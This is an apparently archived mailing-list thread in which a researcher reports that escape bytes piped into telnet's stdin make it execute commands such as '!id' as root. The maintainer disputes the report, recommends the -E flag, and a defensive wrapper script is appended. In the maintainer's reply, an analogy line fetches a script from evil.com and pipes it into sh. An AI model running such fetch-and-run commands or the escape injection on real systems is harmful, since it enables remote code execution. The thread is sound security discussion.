sha0 <[email protected]> writes:

> Hi Simon,
>
> I know this is a "feature", but connecting the stdin of telnet with any kind
> of controllable input, which will rely on command execution, is a dangerous
> default option.

I'm not sure I follow -- connecting the stdin of /bin/sh (as root) with
any kind of input controllable by an attacker is equally dangerous.
What difference do you see between that example and your problem?

Also, doesn't the -E parameter work?  It should disable the escape
sequence.

> I have also another vulnerability related with the stdin parser, it is a
> SIGSEGV, I'm studying if I can control the movl to overwrite a memory
> function pointer in order to get execution,

Can you post a backtrace?  The telnet interactive prompt parser is most
likely just buggy.

/Simon

> But also the attack vector is stdin, then the attack vector is "rare"
>
> regards.
>
> 2011/10/3 Simon Josefsson <[email protected]>
>
>> sha0 <[email protected]> writes:
>>
>> > Hello,
>> >
>> > It is possible to inject an escape sequence via stdin to telnet, and
>> > arbitrary commands will be executed,
>>
>> Hi!  Thanks for studying InetUtils for security problems.  I'm not sure
>> I follow your "attack" though.
>>
>> > for example:
>> >
>> > # cat evil-file | telnet 127.0.0.1 80
>> > Trying 127.0.0.1...
>> > Connected to 127.0.0.1.
>> > Escape character is '^]'.
>> >
>> > telnet> !id
>> > uid=0(root) gid=0(root)
>> > groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log)
>> > Connection closed by foreign host.
>> >
>> > I think it is very dangerous despite few admins using telnet for moving
>> > files like this
>>
>> Yes it is dangerous, so don't do that.  Use ftp to transfer files.
>>
>> > 3. DESCRIPTION
>> > -------------------------
>> > When telnet is used to transfer files to a remote tcp port, a very
>> > dangerous vulnerability is present, that allows remote arbitrary code
>> > execution.
>>
>> The attack seems to be based on tricking the local root user into doing
>> something stupid.  This is similar to asking the local root user to do
>> 'wget -O - http://evil.com/script | sh'.  There is no security bug in
>> wget or sh just because that is possible.
>>
>> > 7. SOLUTION
>> > -------------------------
>> > The stdin parser must filter the 0x9d byte.
>>
>> The ^] escape sequence is a documented feature, so I don't think that is
>> a solution.
>>
>> You can use the command line parameter -E to inhibit the escape
>> character if you want.  Quoting 'telnet --help':
>>
>>   -E, --no-escape            use no escape character
>>
>> /Simon
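The guard below is an added example, not code from this thread or from inetutils: a wrapper for the "cat file | telnet" pattern that refuses input containing the ^] escape byte (0x1d) and otherwise runs telnet with the -E option Simon points to. The function names are this example's own.

```sh
#!/bin/sh
# Added example, not part of the thread: a guard for the "cat file | telnet"
# pattern discussed above. It refuses input that carries the telnet escape
# byte (^] is 0x1d) and otherwise invokes telnet with -E, the option that
# disables the escape character entirely. Function names are illustrative,
# not inetutils'.

ESC_BYTE=$(printf '\035')   # ^] = 0x1d, telnet's default escape character

# has_telnet_escape FILE
#   exit 0 if FILE contains at least one 0x1d byte, 1 otherwise
has_telnet_escape() {
    LC_ALL=C grep -q "$ESC_BYTE" "$1"
}

# count_telnet_escapes FILE
#   print the number of 0x1d bytes in FILE (useful when logging a rejection)
count_telnet_escapes() {
    LC_ALL=C tr -cd '\035' < "$1" | wc -c | tr -d ' '
}

# telnet_pipe_file FILE HOST PORT
#   refuse escape-bearing input (exit 2); otherwise feed FILE to telnet -E
telnet_pipe_file() {
    file=$1 host=$2 port=$3
    if has_telnet_escape "$file"; then
        echo "refusing $file: $(count_telnet_escapes "$file") escape byte(s) found" >&2
        return 2
    fi
    telnet -E "$host" "$port" < "$file"
}
```

Even with the check in place, -E is the setting that matters: it removes the interactive prompt from the data path, so a stray 0x1d byte can no longer reach "telnet> !".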
